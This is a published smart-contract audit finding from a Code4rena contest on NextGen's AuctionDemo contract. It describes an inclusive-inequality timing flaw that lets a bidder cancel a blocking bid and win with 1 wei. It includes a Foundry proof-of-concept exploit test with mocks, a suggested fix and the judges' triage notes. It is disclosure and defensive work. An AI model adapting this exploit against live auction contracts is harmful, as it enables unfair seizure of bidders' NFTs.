Back to shenwilly's contests

NextGen - shenwilly's results

Advanced smart contracts for launching generative art projects on Ethereum.

General Information

Platform: Code4rena

Start Date: 30/10/2023

Pot Size: $49,250 USDC

Total HM: 14

Participants: 243

Period: 14 days

Judge: 0xsomeone

Id: 302

League: ETH

NextGen

Findings Distribution

Researcher Performance

Rank: 210/243

Findings: 1

Award: $0.00

🌟 Selected for report: 0

🚀 Solo Findings: 0

External Links

Code4rena Contest PageGithub Contest RepositoryGithub Findings RepositoryNextGen

Findings Information

🌟 Selected for report: smiling_heretic

Also found by: 00decree, 00xSEV, 0x180db, 0x3b, 0x656c68616a, 0xAadi, 0xAleko, 0xAsen, 0xDetermination, 0xJuda, 0xMAKEOUTHILL, 0xMango, 0xMosh, 0xSwahili, 0x_6a70, 0xarno, 0xgrbr, 0xpiken, 0xsagetony, 3th, 8olidity, ABA, AerialRaider, Al-Qa-qa, Arabadzhiev, AvantGard, CaeraDenoir, ChrisTina, DanielArmstrong, DarkTower, DeFiHackLabs, Deft_TT, Delvir0, Draiakoo, Eigenvectors, Fulum, Greed, HChang26, Haipls, Hama, Inference, Jiamin, JohnnyTime, Jorgect, Juntao, Kaysoft, Kose, Kow, Krace, MaNcHaSsS, Madalad, MrPotatoMagic, Neon2835, NoamYakov, Norah, Oxsadeeq, PENGUN, REKCAH, Ruhum, Shubham, Silvermist, Soul22, SovaSlava, SpicyMeatball, Talfao, TermoHash, The_Kakers, Toshii, TuringConsulting, Udsen, VAD37, Vagner, Zac, Zach_166, ZdravkoHr, _eperezok, ak1, aldarion, alexfilippov314, alexxander, amaechieth, aslanbek, ast3ros, audityourcontracts, ayden, bdmcbri, bird-flu, blutorque, bronze_pickaxe, btk, c0pp3rscr3w3r, c3phas, cartlex_, cccz, ciphermarco, circlelooper, crunch, cryptothemex, cu5t0mpeo, darksnow, degensec, dethera, devival, dimulski, droptpackets, epistkr, evmboi32, fibonacci, gumgumzum, immeas, innertia, inzinko, jasonxiale, joesan, ke1caM, kimchi, lanrebayode77, lsaudit, mahyar, max10afternoon, merlin, mrudenko, nuthan2x, oakcobalt, openwide, orion, phoenixV110, pontifex, r0ck3tz, rotcivegaf, rvierdiiev, seeques, shenwilly, sl1, slvDev, t0x1c, tallo, tnquanghuy0512, tpiliposian, trachev, twcctop, vangrim, volodya, xAriextz, xeros, xuwinnie, y4y, yobiz, zhaojie

Awards

0 USDC - $0.00

Labels

bug
3 (High Risk)
partial-50
duplicate-1323

External Links

Link to GitHub issue

Lines of code

https://github.com/code-423n4/2023-10-nextgen/blob/8b518196629faa37eae39736837b24926fd3c07c/smart-contracts/AuctionDemo.sol#L57-L61 https://github.com/code-423n4/2023-10-nextgen/blob/8b518196629faa37eae39736837b24926fd3c07c/smart-contracts/AuctionDemo.sol#L104-L120 https://github.com/code-423n4/2023-10-nextgen/blob/8b518196629faa37eae39736837b24926fd3c07c/smart-contracts/AuctionDemo.sol#L124-L130

Vulnerability details

Impact

This vulnerability enables malicious actors to unfairly manipulate an auction and winning them with a minimal bid of 1 wei.

Vulnerability Details

When ending auction via claimAuction, there is a check to ensure that the auction has ended, using the inclusive inequality operator >=:

require(block.timestamp >= minter.getAuctionEndTime(_tokenid)

On the other hand, both the participateToAuction and cancelBid functions also have a check to ensure that the auction hasn't ended using an inclusive operator <=:

require(block.timestamp <= minter.getAuctionEndTime(_tokenid), "Auction ended");

Due to this combination of checks, a potential vulnerability arises. An attacker could take advantage of a specific scenario: At the beginning of the auction, the malicious party places an extremely high bid, preventing others from bidding. When the auction is about to end, during the same block where the auctionEndTime falls, the malicious party atomically cancels their bid, place a minimal bid of 1 wei, and settling the auction, winning the NFT.

Proof of Concept

pragma solidity ^0.8.0;

import "forge-std/Test.sol";
import "forge-std/interfaces/IERC20.sol";
import "forge-std/console.sol";

import "./AuctionDemo.sol";
import "./MockMinter.sol";
import "./MockERC721.sol";

contract NextGenAttack is Test {
    MockMinter public minter;
    MockERC721 public nft;
    auctionDemo public auction;

    address owner = address(0x999);

    function setUp() public {
        deal(address(this), 1000e18);

        minter = new MockMinter();
        nft = new MockERC721();
        auction = new auctionDemo(address(minter), address(nft), address(0));
        auction.transferOwnership(owner);
    }
    
    function testAttack() public {
        console.log("Balance before attack:", address(this).balance); // 1000000000000000000000
        
        uint256 tokenId = 1;
        uint256 auctionEnd = block.timestamp + 1000;
        minter.mintAndAuction(tokenId, auctionEnd);

        // 1. Bid with a ridiculous amount, ensuring no one else can bid
        auction.participateToAuction{value: 100e18}(tokenId);

        // 2. Wait until auctionEndTime
        skip(auctionEnd - block.timestamp);
        
        // 3. Atomically cancel previous bid, bid with 1 wei, and claim the auction
        auction.cancelBid(tokenId, 0);
        auction.participateToAuction{value: 1}(tokenId);
        auction.claimAuction(tokenId);

        console.log("Balance after attack:", address(this).balance); // 999999999999999999999
    }

    receive() external payable {}
}

pragma solidity ^0.8.19;

import "./IMinterContract.sol";

contract MockMinter is IMinterContract {
    mapping (uint256 => uint) private mintToAuctionData;

    mapping (uint256 => bool) private mintToAuctionStatus;

    function getAuctionEndTime(uint256 _tokenId) external view returns (uint) {
        return mintToAuctionData[_tokenId];
    }

    function getAuctionStatus(uint256 _tokenId) external view  returns (bool) {
        return mintToAuctionStatus[_tokenId];
    }

    function isMinterContract() external view override returns (bool) {
        return true;
    }

    function getEndTime(
        uint256 _collectionID
    ) external view override returns (uint) {
        return 0;
    }

    function mintAndAuction(uint256 _tokenId, uint256 _auctionEndTime) external {
        mintToAuctionData[_tokenId] = _auctionEndTime;
        mintToAuctionStatus[_tokenId] = true;
    }
}

pragma solidity ^0.8.19;

contract MockERC721 {
    mapping(uint256 => address) public tokenOwners;

    function ownerOf(uint256 _tokenId) external view returns (address) {
        return tokenOwners[_tokenId];
    }

    function setOwner(uint256 _tokenId, address _owner) external {
        tokenOwners[_tokenId] = _owner;
    }

    function safeTransferFrom(address from, address to, uint256 tokenId) external {}
}

Implement a strict inequality check in the claimAuction function. Additionally, introduce a penalty mechanism for canceling bids, such as extending the auction duration by a predefined period (e.g., ten minutes), if bids are made during the final moments of the auction, to deter tactics involving last-minute bid cancellations and minimal rebidding.

Assessed type

Timing

#0 - c4-pre-sort

2023-11-15T05:22:56Z

141345 marked the issue as duplicate of #962

#1 - c4-judge

2023-12-02T15:12:03Z

alex-ppg marked the issue as not a duplicate

#2 - c4-judge

2023-12-02T15:14:06Z

alex-ppg marked the issue as duplicate of #1784

#3 - c4-judge

2023-12-07T11:51:05Z

alex-ppg marked the issue as duplicate of #1323

#4 - c4-judge

2023-12-08T17:16:09Z

alex-ppg marked the issue as partial-50

#5 - c4-judge

2023-12-08T17:27:50Z

alex-ppg marked the issue as satisfactory

#6 - c4-judge

2023-12-08T17:48:09Z

alex-ppg marked the issue as partial-50

AuditHub

A portfolio for auditors, a security profile for protocols, a hub for web3 security.

Built bymalatrax © 2024

Auditors

Browse

Contests

Browse

Get in touch

ContactTwitter